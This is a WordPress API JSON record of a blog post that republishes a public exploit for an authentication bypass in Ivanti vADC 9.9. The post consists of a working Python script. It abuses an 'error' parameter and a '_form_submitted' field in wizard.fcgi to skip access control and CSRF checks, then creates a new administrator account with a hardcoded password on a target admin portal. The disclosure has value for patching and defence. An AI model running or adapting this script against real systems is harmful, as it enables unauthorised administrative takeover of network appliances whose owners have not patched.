{"id":58641,"date":"2024-08-05T20:39:48","date_gmt":"2024-08-05T17:39:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179906\/ivantiadc99-bypass.txt"},"modified":"2024-08-05T20:39:48","modified_gmt":"2024-08-05T17:39:48","slug":"ivanti-adc-9-9-authentication-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ivanti-adc-9-9-authentication-bypass\/","title":{"rendered":"Ivanti ADC 9.9 Authentication Bypass"},"content":{"rendered":"<p># Exploit Title: Ivanti vADC 9.9 &#8211; Authentication Bypass<br \/># Date: 2024-08-03<br \/># Exploit Author: ohnoisploited<br \/># Vendor Homepage: https:\/\/www.ivanti.com\/en-gb\/products\/virtual-application-delivery-controller<br \/># Software Link: https:\/\/hubgw.docker.com\/r\/pulsesecure\/vtm<br \/># Version: 9.9<br \/># Tested on: Linux<br \/># Name Changes: Riverbed Stringray Traffic Manager -&gt; Brocade vTM -&gt; Pulse Secure Virtual Traffic Manager -&gt; Ivanti vADC <br \/># Fixed versions: 22.7R2+<\/p>\n<p>import requests<\/p>\n<p># Set to target address<br \/>admin_portal = &#8216;https:\/\/192.168.88.130:9090&#8217;<\/p>\n<p># User to create<br \/>new_admin_name = &#8216;newadmin&#8217;<br \/>new_admin_password = &#8216;newadmin1234&#8217;<\/p>\n<p>requests.packages.urllib3.disable_warnings() <br \/>session = requests.Session()<\/p>\n<p># Setting &#8216;error&#8217; bypasses access control for wizard.fcgi.<br \/># wizard.fcgi can load any section in the web interface.<br \/>params = { &#8216;error&#8217;: 1,<br \/>&#8216;section&#8217;: &#8216;Access Management:LocalUsers&#8217; }<\/p>\n<p># Create new user request<br \/># _form_submitted to bypass CSRF<br \/>data = { &#8216;_form_submitted&#8217;: &#8216;form&#8217;,<br \/>&#8216;create_user&#8217;: &#8216;Create&#8217;,<br \/>&#8216;group&#8217;: &#8216;admin&#8217;,<br \/>&#8216;newusername&#8217;: new_admin_name,<br \/>&#8216;password1&#8217;: new_admin_password,<br \/>&#8216;password2&#8217;: new_admin_password }<\/p>\n<p># Post request<br \/>r = session.post(admin_portal + &#8220;\/apps\/zxtm\/wizard.fcgi&#8221;, params=params, data=data, verify=False, allow_redirects=False)<\/p>\n<p># View response<br \/>content = r.content.decode(&#8216;utf-8&#8217;)<br \/>print(content)<\/p>\n<p>if r.status_code == 200 and &#8216;&lt;title&gt;2&lt;&#8216; in content:<br \/>print(&#8220;New user request sent&#8221;)<br \/>print(&#8220;Login with username &#8216;&#8221; + new_admin_name + &#8220;&#8216; and password &#8216;&#8221; + new_admin_password + &#8220;&#8216;&#8221;)<br \/>else:<br \/>print(&#8220;Unable to create new user&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Ivanti vADC 9.9 &#8211; Authentication Bypass# Date: 2024-08-03# Exploit Author: ohnoisploited# Vendor Homepage: https:\/\/www.ivanti.com\/en-gb\/products\/virtual-application-delivery-controller# Software Link: https:\/\/hubgw.docker.com\/r\/pulsesecure\/vtm# Version: 9.9# Tested on: Linux# Name Changes: Riverbed Stringray Traffic Manager -&gt; Brocade vTM -&gt; Pulse Secure Virtual Traffic Manager -&gt; Ivanti vADC # Fixed versions: 22.7R2+ import requests # Set to target addressadmin_portal = &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58641","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58641"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58641\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}